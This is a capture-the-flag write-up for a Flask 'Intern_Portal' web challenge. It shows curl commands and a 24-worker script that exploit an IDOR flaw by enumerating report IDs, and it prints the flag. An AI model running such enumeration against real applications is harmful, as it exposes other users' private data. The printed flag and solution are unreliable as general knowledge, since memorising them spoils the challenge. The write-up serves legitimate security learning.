Skip to main content

Intern_Portal

Challenge

Imported from local notes.md.

Solution

Original Notes

Intern_Portal

Challenge Summary

  • Given: a live web application at http://23.179.17.92:5001 with no downloadable files.
  • Goal: find the flag from the intern portal.
  • Constraints: authenticated web challenge; only the app link is provided.

Initial Recon / Triage

  • Observations:
    • The app is a small Flask/Werkzeug portal with /login, /register, /logout, and a /report workflow.
    • After login, the dashboard lists report links as /report?id=<id> and allows creating new reports.
    • The report view rendered stored content literally, so SSTI was not the issue.
    • Any authenticated user could request arbitrary report IDs and read other users' reports.
  • File identification:
    • No starting files were provided.
    • artifacts/scan_reports.py was created to enumerate report IDs and search report contents.
  • Entry points:
    • Authenticated access to /report?id=<id>.
    • Broken access control / IDOR on report IDs.

Hypotheses & Approach

  • Hypothesis 1: the report creation or display path might be vulnerable to SSTI because the prompt mentioned a custom report application.
  • Hypothesis 2: the real bug was weaker and more common: report IDs were directly accessible without ownership checks, allowing report enumeration.

Execution Steps (Reproducible)

Stage 1

Commands:

curl -iLs http://23.179.17.92:5001

# register a disposable user, then log in
curl -c cookies.txt -b cookies.txt -X POST http://23.179.17.92:5001/register \
	-d 'username=<tempuser>&password=<temppass>'
curl -c cookies.txt -b cookies.txt -X POST http://23.179.17.92:5001/login \
	-d 'username=<tempuser>&password=<temppass>'

Results:

  • Confirmed the application is a simple authenticated report portal.
  • The dashboard exposed report links in the form /report?id=<id>.

Stage 2

Commands:

curl -b cookies.txt 'http://23.179.17.92:5001/report?id=5630'
curl -b cookies.txt 'http://23.179.17.92:5001/report?id=5628'
curl -b cookies.txt 'http://23.179.17.92:5001/report?id=1'

Results:

  • Confirmed an IDOR: authenticated access to arbitrary report IDs returned other users' reports, not just the current user's content.

Stage 3

Commands:

cd /root/cit2026CTF/Intern_Portal
INTERN_PORTAL_USER=<tempuser> INTERN_PORTAL_PASS=<temppass> \
	/usr/bin/python3 artifacts/scan_reports.py --start 1 --end 5631 --workers 24

Results:

  • The scanner found FLAG 347 CIT{Acc355_C0ntr0l_M@tt3rs!}.
  • The flag was stored inside report ID 347 and was readable through the broken access control on /report?id=.

Artifacts Produced

  • artifacts/scan_reports.py

Flag

CIT{Acc355_C0ntr0l_M@tt3rs!}